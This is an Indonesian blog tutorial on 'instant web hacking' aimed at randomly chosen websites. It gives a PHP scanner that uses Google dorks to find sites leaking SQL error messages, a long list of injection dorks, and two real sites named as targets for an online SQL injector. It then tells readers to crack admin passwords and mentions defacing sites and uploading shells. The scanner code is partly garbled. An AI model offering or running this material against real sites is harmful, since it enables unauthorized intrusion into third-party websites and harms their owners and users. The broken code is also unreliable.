Disini saya lebih menekankan kepada Web Hacking karena kan lagi hot – hotnya...
Langsung aja yuk kita bahas…
Random Web Hacking
Menurut saya ini yang paling mudah, melakukan penetrasi suatu website yang bersifat random. Artinya kita gak menentukan siapa target kita, tetapi dengan perantara Search Engine (Biasanya loh) kita mencari satu per satu website yang “kita anggap” memiliki celah keamanan yang bisa kita exploitasi.
Disini saya ada script php sederhana buatan XshimeX (gak enak masa scriptnya jadi balik nama ). Buat aja sqliscanner.php dan paste kode berikut…
Code:
\n"; print "[%] Example : $argv[0] inurl:news.php?id=\n"; exit; } /** * SQL Bug(syntax error) takes from here: http://www.darkc0de.com/others/devilzc0de.py */ $bug = array( 'You have an error in your SQL','Division by zero in', 'supplied argument is not a valid MySQL result resource in', 'Call to a member function','Microsoft JET Database', 'ODBC Microsoft Access Driver', 'Microsoft OLE DB Provider for SQL Server', 'Unclosed quotation mark', 'Microsoft OLE DB Provider for Oracle', 'Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect', 'Incorrect syntax near' ); print "[@] Start Finding Links...\n"; for($i = 0; $i <= 900; $i += 100) { $fp = @file_get_contents("http://www.google.com/search?q=$argv[1]&num=100&hl=en&as_qdr=all&start=$i&sa=N"); @preg_match_all("/ /", $fp, $links); $url[] = $links[2]; } print "[@] Done Finding Links...\n"; print "[@] Now searching for Vulnerable\n"; foreach($url as $key) { foreach($key as $value) { $fp = @file_get_contents($value."'"); foreach($bug as $error) { if(@preg_match("/$error/", $fp)) { print "[#] Posibble SQL Injection: $value'\n"; $vuln++; } else { $not_vuln++; } $total++; } } } print "[@] Done Scanning\n"; print "[%] Result\n"; print "[-] Total Vulnerable: $vuln\n"; print "[-] Total Not Vulnerable : $not_vuln\n"; print "[-] Total scanned Website: $total\n"; print "Enjoy :)\n"; ?>
Lalu copy file sqliscanner.php yang telah kita buat tadi ke dalam folder PHPnya…
Setelah itu buka Command Prompt dan pergi ke direktori C:\php dan jalankan sqliscanner.php tersebut dengan perintah.
Code:
php.exe sqliscanner.php (DORK)
Code:
inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl:offer.php?idf= inurl:art.php?idm= inurl:title.php?id=
Jadi nanti perintahnya seperti berikut…
Code:
php.exe sqliscanner.php inurl:index.php?id=
Jika kalian liat dan perhatikan source code dari sqliscanner.php menggunakan jasa http://www.google.com/search?. Nah kita juga bisa edit sesuka kita dengan mengganti nama domain Googlenya sesuai dengan negara yang kita mau. Berikut listnya…
Code:
USA = www.google.com Afghanistan = www.google.com.af American Samoa = www.google.as Anguilla = www.google.off.ai Antigua and Barbuda = www.google.com.ag Argentina = www.google.com.ar Armenia = www.google.am Australia = www.google.com.au Austria = www.google.at Azerbaijan = www.google.az Bahrain = www.google.com.bh Bangladesh = www.google.com.bd Belgium = www.google.be Belize = www.google.com.bz Bolivia = www.google.com.bo Bosnia and Herzegovina = www.google.ba Botswana = www.google.co.bw Brazil = www.google.com.br British Virgin Islands = www.google.vg Bulgaria = www.google.bg Burundi = www.google.bi Canada = www.google.ca Chile = www.google.cl China = www.google.cn Colombia = www.google.com.co Congo, Democratic Republic of the = www.google.cd Congo, Republic of the = www.google.cg Cook Islands = www.google.co.ck Costa Rica = www.google.co.cr Croatia = www.google.hr Cuba = www.google.com.cu Czech Republic = www.google.cz Cote dCase Ivoire = www.google.ci Denmark = www.google.dk Djibouti = www.google.dj Dominica = www.google.dm Dominican Republic = www.google.com.do Ecuador = www.google.com.ec Egypt = www.google.com.eg El Salvador = www.google.com.sv Estonia = www.google.ee Ethiopia = www.google.com.et Fiji = www.google.com.fj Finland = www.google.fi France = www.google.fr Gambia = www.google.gm Germany = www.google.de Gibraltar = www.google.com.gi Greece = www.google.com.gr Greenland = www.google.gl Guatemala = www.google.com.gt Guernsey = www.google.gg Haiti = www.google.ht Honduras = www.google.hn Hong Kong = www.google.com.hk Hungary = www.google.hu Iceland = www.google.is India = www.google.co.in Indonesia = www.google.co.id Ireland = www.google.ie Isle of Man = www.google.co.im Israel = www.google.co.il Italy = www.google.it Jamaica = www.google.com.im Japan = www.google.co.jp Jersey = www.google.co.je Jordan = www.google.jo Kazakhstan = www.google.kz Kenya = www.google.co.ke Kyrgyzstan = www.google.kg Latvia = www.google.lv Lesotho = www.google.co.ls Libya = www.google.co.ly Liechtenstein = www.google.li Lithuani = www.google.lt Luxembourg = www.google.lu Malawi = www.google.mw Malaysia = www.google.com.my Malta = www.google.com.mt Mauritius = www.google.mu Mexico = www.google.com.mx Micronesia = www.google.fm Mongolia = www.google.mn Montserrat = www.google.ms Morocco = www.google.co.ma Namibia = www.google.com.na Nepal = www.google.com.np Netherlands = www.google.nl New Zealand = www.google.co.nz Nicaragua = www.google.com.ni Norfolk Island = www.google.com.nf Norway = www.google.no Oman = www.google.com.om Pakistan = www.google.com.pk Panama = www.google.com.pa Paraguay = www.google.com.py Peru = www.google.com.pe Philippines = www.google.com.ph Pitcairn = www.google.com.pn Poland = www.google.pl Portugal = www.google.pt Puerto Rico = www.google.com.pr Qatar = www.google.com.qa Romania = www.google.ro Russia = www.google.ru Rwanda = www.google.rw Saint Helena = www.google.sh San Marino = www.google.sm Saudi Arabia = www.google.com.sa Senegal = www.google.sn Seychelles = www.google.sc Singapore = www.google.com.sg Slovakia = www.google.sk Slovenia = www.google.si South Africa = www.google.co.za South Korea = www.google.co.kr Spain = www.google.es Sri Lanka = www.google.lk St.Vincent and the Grenadines = www.google.com.vc Sweden = www.google.se Switzerland = www.google.ch Taiwan = www.google.com.tw Tajikistan = www.google.com.tj Thailand = www.google.co.th The Bahamas = www.google.bs Tonga = www.google.to Trinidad and Tobago = www.google.tt Turkey = www.google.com.tr Turkmenistan = www.google.tm U.S. Virgin Islands = www.google.co.vi Uganda = www.google.co.ug Ukraine = www.google.com.ua United Arab Emirates = www.google.ae United Kingdom = www.google.co.uk Uruguay = www.google.com.uy Uzbekistan = www.google.co.uz Venezuela = www.google.co.ve Vietnam = www.google.com.vn Zambia = www.google.co.zm
Code:
site:my
Nah sekarang bagaimana lagi? Oke, tahap kedua nih ada 1 tools online yang keren abis buatan Master Ketek… Apalagi kalo bukan http://tools.kerinci.net/?x=injector. Suer dah, keren banget. Oke sekarang paste link yang tadi telah kita dapatkan dari hasil scanning dengan menggunakan sqliscanner.php yaitu…
Code:
http://www.greenbergresearch.com/index.php?ID=403
Yah… Versi 4, males cuy. Udah dulu yah artikelnya… Wakakakakakakak, becanda sob. Disini jujur saya tidak menitik beratkan langsung kepada bagaimana cara mendapatkan databasenya, kita dump, cari halaman admin dan deface atau upload shell tetapi yang penting kita dah tahu metode dan tools apa yang bisa kita gunakan.
Nah ada 1 tools online lagi yang cara kerjanya mirip dengan sqliscanner.php yaitu di http://revtan.site40.net/, lebih tepatnya di SQLi Dork Scanner dan kira – kira hasilnya tetap sama kok…
Toolsnya gak cuman sqli scanner tapi ada Login Page Finder dan Hash Cracker… Oke dipercepat neh, misalkan kita dah dapet target dan kebetulan Versi 5 langsung aja ke http://tools.kerinci.net/?x=injector, paste URLnya
Code:
http://www.indiesmovies.com/news.php?section=movienews&layer=detail&id=36
Lalu kemudian silahkan crack passwordnya dan cari halaman adminnya sendiri…
Dedicated Web Hacking
Nah ini yang agak susah – susah gampang menurut saya, website yang akan kita serang memang kita sudah tentukan sendiri. Gampang kalo emang pas ketemu vulnerablenya, susah yah kalo emang gak ketemu sama sekali. Banyak metode yang bisa kita lakukan tetapi saya kurang ahli dalam hal ini. Wakakakakak…
Biasanya seh saya menggunakan darkjumper dan mungkin kalian bisa langsung aja baca – baca disini.
Oke sampai disini dulu beberapa tutorial ringan dari saya, ingat… Hacking itu Seni!!! Oleh sebab itu setiap orang memiliki metode yang berbeda – beda jadi jangan terpaku hanya pada satu hal. Cari caramu sendiri. Sampai bertemu di tutorial berikutnya…
Source : http://cruzenaldo.com/instant-web-hacking/
0 Response to "Instant Web Hacking"
Posting Komentar